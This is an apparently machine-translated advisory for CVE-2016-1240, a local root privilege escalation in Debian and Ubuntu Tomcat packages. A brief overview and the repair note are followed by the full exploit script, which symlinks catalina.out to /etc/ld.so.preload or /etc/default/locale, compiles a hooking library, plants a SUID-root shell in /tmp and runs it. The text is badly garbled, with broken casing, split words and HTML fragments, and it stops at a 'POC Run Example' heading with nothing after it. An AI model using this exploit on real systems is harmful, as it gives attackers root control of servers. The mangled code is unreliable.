Vulnerability warning: Tomcat exposure to the local right to exploit the vulnerability

Tomcat on October 1 exposed the local right to claim loopholes cve-2016-1240. With only low privileges for tomcat users, attackers can exploit this vulnerability to gain root access to the system. And the vulnerability is not very difficult to use, affected users need special attention.

Tomcat is an application server running on Apache that supports the container for running SERVLET/JSP applications-you can consider Tomcat as an extension of Apache, and Tomcat can actually run independently of Apache.

Vulnerability Number:

cve-2016-1240 Impact Range:

Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+DFSG-1~DEB8U1

The affected systems include Debian, Ubuntu, and other systems that use the appropriate Deb package may also be affected. Repair Scheme:

The Debian security team has repaired the affected packages and is updated to the latest version of the Tomcat package provided by the system. Vulnerability Overview:

Linux on the Debian system administrators often use Apt-get for package management, cve-2016-1240 This vulnerability the problem is in Tomcat's Deb package, so that the Tomcat program installed by the Deb package will automatically install a startup script for the administrator:/etc/ Init.d/tocat* uses this script to cause an attacker to gain system root privileges through a low privilege tomcat user.

# Run The catalina.sh script as a daemon

Set +e

Touch "$CATALINA _pid" "$CATALINA _base"/logs/catalina.out

Chown $TOMCAT 7_user "$CATALINA _pid" "$CATALINA _base"/logs/catalina.out

Local attackers, as Tomcat users (for example, vulnerabilities via Web applications) modify Catalina.out to link to arbitrary system files, once Tomcat The init script (run by Root) opens the Catalina.out file again after the service restarts, and the attacker can obtain root permissions. Vulnerability POC:

#!/bin/bash # Tomcat 6/7/8 on debian-based distros-local Root Privilege escalation # exploit # Disco Vered and coded by: # # Dawid Golunski # http://legalhackers.com # This exploit targets Tomcat (versions 6, 7 and 8) PAC kaging on # debian-based distros including Debian, Ubuntu etc. # allows attackers with a tomcat shell (e.g. obtained r Emotely through a # vulnerable Java WebApp, or locally via weak permissions on WebApps in the # Tomcat Webroot ES etc.)
To escalate their privileges to root. # Usage: #/tomcat-rootprivesc-deb.sh Path_to_catalina.out [-deferred] # The exploit can used in two ways: # #-activ E (assumed by default)-which waits for a Tomcat restart in a loop and instantly # Gains/executes a Rootshell via LD.SO.P 
Reload as soon as Tomcat service is restarted. # It also gives attacker a chance to Execute:kill [tomcat-pid] command to force/speed up # a Tomcat restart (done Manuall Y by a admin, or potentially by some Tomcat ServicE watchdog etc.) # #-deferred (requires the-deferred switch on argv[2])-This mode symlinks the logfile to #/etc/default/locale and ex Its. 
It removes the need for the exploit to run in a loop waiting. # attackers can come back in a later and check on The/etc/default/locale file. Upon a # tomcat Restart/server reboot, the file should is owned by Tomcat user. The attackers can # then add arbitrary commands to the file which'll be executed with root privileges by # The/etc/cro
N.daily/tomcatn logrotation Cronjob (run daily around 6:25am on default # Ubuntu/debian Tomcat installations). # # Advisory for details at: # http://legalhackers.com/advisories/ tomcat-debpkgs-root-privilege-escalation-exploit-cve-2016-1240.html # Disclaimer: # for testing purposes only.
Do no harm. # backdoorsh= "/bin/bash" backdoorpath= "/tmp/tomcatrootsh" privesclib= "/tmp/privesclib.so" PRIVESCSRC= "/tmp/" PRIVESCLIB.C "suidbin="/usr/bin/sudo function cleanexit {    # ClEanup     echo-e "\n[+] cleaning up ..."     rm-f $PRIVESCSRC     rm-f $PR Ivesclib     rm-f $TOMCATLOG     touch $TOMCATLOG     if [-f/etc/ld.so.pre Load]; Then         echo-n >/etc/ld.so.preload 2>/dev/null     fi  & nbsp  echo-e "\n[+] Job done.  Exiting with code $ \ n "    exit} function Ctrl_c () {        echo -E "\n[+] Active exploitation aborted. Remember can use-deferred switch for deferred exploitation. "    cleanexit 0} #intro echo-e" \033[  94m \ntomcat 6/7/8 on debian-based distros-local Root privilege escalation exploit\ncve-2016-1240\n "ECHO-E" Discovered  and coded by: \n\ndawid Golunski \nhttp://legalhackers.com \033[0m "# Args if [$#-lt 1]; then     echo -E "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n "    exit 3 fi if [" $ "="-deferred "];  Then     mode= "deferred" Else     mode= "active" Fi # Priv Check echo-e "\n[+" starting the Exploit in [\033[94m$mode\033[0m] mode with the following privileges: \ n ' id ' id | grep-q tomcat if [$-ne 0]; then & nbsp;   echo-e "\n[!] You are need to execute the exploit as Tomcat user! exiting.\n "    exit 3 fi # Set target paths tomcatlog=" $ "if [!-f $TOMCATLOG]; Then     echo-e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn ' t exist. Try again.\n "    exit 3 fi echo-e" \n[+] Target Tomcat log file set to $TOMCATLOG "# [Deferred Exploita tion] # Symlink The log file To/etc/default/locale file which gets executed daily in default # Tomcat installations on
Debian/ubuntu by The/etc/cron.daily/tomcatn logrotation cronjob around 6:25am. # attackers can freely add their commands to The/etc/default/locale script after TomCat has been # restarted and file owner gets changed. If ["$mode" = "deferred"]; Then     rm-f $TOMCATLOG && ln-s/etc/default/locale $TOMCATLOG     if [$-ne 0 ]; Then         echo-e "\n[!] Couldn ' t remove the $TOMCATLOG file or create a symlink. "        cleanexit 3    &  Nbsp;fi     echo-e  "\n[+] Symlink created at: \ n ' ls-l $TOMCATLOG '"     echo-e   "\n[+]" the current owner of the file is: \ n ' ls-l/etc/default/locale ' "    echo-ne" \n[+] Keep an eye on The owner change On/etc/default/locale. After the Tomcat restart/system reboot "    echo-ne" \n    you'll be able to add Arbitrar Y commands to the file which'll get executed with root privileges '     echo-ne ' \n    at ~6:25am by The/etc/cron.daily/tomcatn log rotation cron. also-active Mode If you can ' t wait \ n \ nplease '     exit 0 fi # [Active exploitation] Trap Ctrl_c INT # Compile Privesc Preloa  D Library ECHO-E "\n[+] compiling the Privesc shared library ($PRIVESCSRC)" Cat <<_solibeof_> $PRIVESCSRC #define _gnu_source #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> uid _t geteuid (void) {    static uid_t  (*old_geteuid) ();     old_geteuid = Dlsym (rtld_
NEXT, "Geteuid");     if (old_geteuid () = = 0) {        chown ("$BACKDOORPATH", 0, 0);  & nbsp
     chmod ("$BACKDOORPATH", 04777);
        unlink ("/etc/ld.so.preload");
   &nbsp     return old_geteuid (); _solibeof_ gcc-wall-fpic-shared-o $PRIVESCLIB $PRIVESCSRC-LDL if [$-ne 0]; Then     echo-e "\n[!] Failed to compile the Privesc Lib $PRIVESCSRC. "    cleanexit 2; Fi # Prepare Backdoor shell CP $BACKDOORSH $BACKDOORPATH echo-e "\n[+] Backdoor/low-priv shell installed at: \ n ' ls-l $B Ackdoorpath ' "# Safety check if [-f/etc/ld.so.preload]; Then     echo-e "\n[!] /etc/ld.so.preload already exists. Exiting for safety. "    cleanexit 2 fi # Symlink the log file to Ld.so.preload rm-f $TOMCATLOG &&amp ; Ln-s/etc/ld.so.preload $TOMCATLOG If [$-ne 0]; Then     echo-e "\n[!]  Couldn ' t remove the $TOMCATLOG file or create a symlink. "    cleanexit 3 fi echo-e" \n[+] Symlink created At: \ n ' ls-l $TOMCATLOG ' # Wait for Tomcat to re-open the logs Echo-ne ' \n[+] waiting for Tomcat to re-open the logs/t Omcat Service restart ... "echo-e " \nyou could speed things up by Executing:kill [Tomcat-pid] (as Tomcat user) if Needed "while:; Do     sleep 0.1     if [-f/etc/ld.so.preload]; Then        &NBSp;echo $PRIVESCLIB >/etc/ld.so.preload         break;      fi Done #/etc/ld.so.preload file should is owned by Tomcat to the ' point # Inject the privesc.so Shared library to escalate privileges echo $PRIVESCLIB >/etc/ld.so.preload echo-e "\n[+" Tomcat restarted. The/etc/ld.so.preload file got created with Tomcat privileges: \ n ' ls-l/etc/ld.so.preload ' "echo-e" \n[+] adding $PRIVE Sclib shared lib To/etc/ld.so.preload "Echo-e" \n[+] The/etc/ld.so.preload file now contains: \ n ' cat/etc/ld.so.preload  ' # escalating privileges via the SUID binary (e.g./usr/bin/sudo) echo-e "\n[+] escalating privileges via the $SUIDBIN SUID binary to get root! ' sudo--help 2>/dev/null >/dev/null # Check for the Rootshell ls-l $BACKDOORPATH | grep RWS | Grep-q root if [$-eq 0]; Then     echo-e "\n[+] Rootshell got assigned root SUID perms at: \ n ' ls-l $BACKDOORPATH '"    & Nbsp;echo-e "\n\033[94mplease Tell me ' re seeing this too \033[0m ' else     echo-e ' \n[!] Failed to get Root "    cleanexit 2 fi # Execute the Rootshell echo-e" \n[+ "executing the Rootshell $BAC Kdoorpath now! \ n "$BACKDOORPATH-P-C" rm-f/etc/ld.so.preload;
Rm-f $PRIVESCLIB "$BACKDOORPATH-P # Job done. Cleanexit 0

POC Run Example: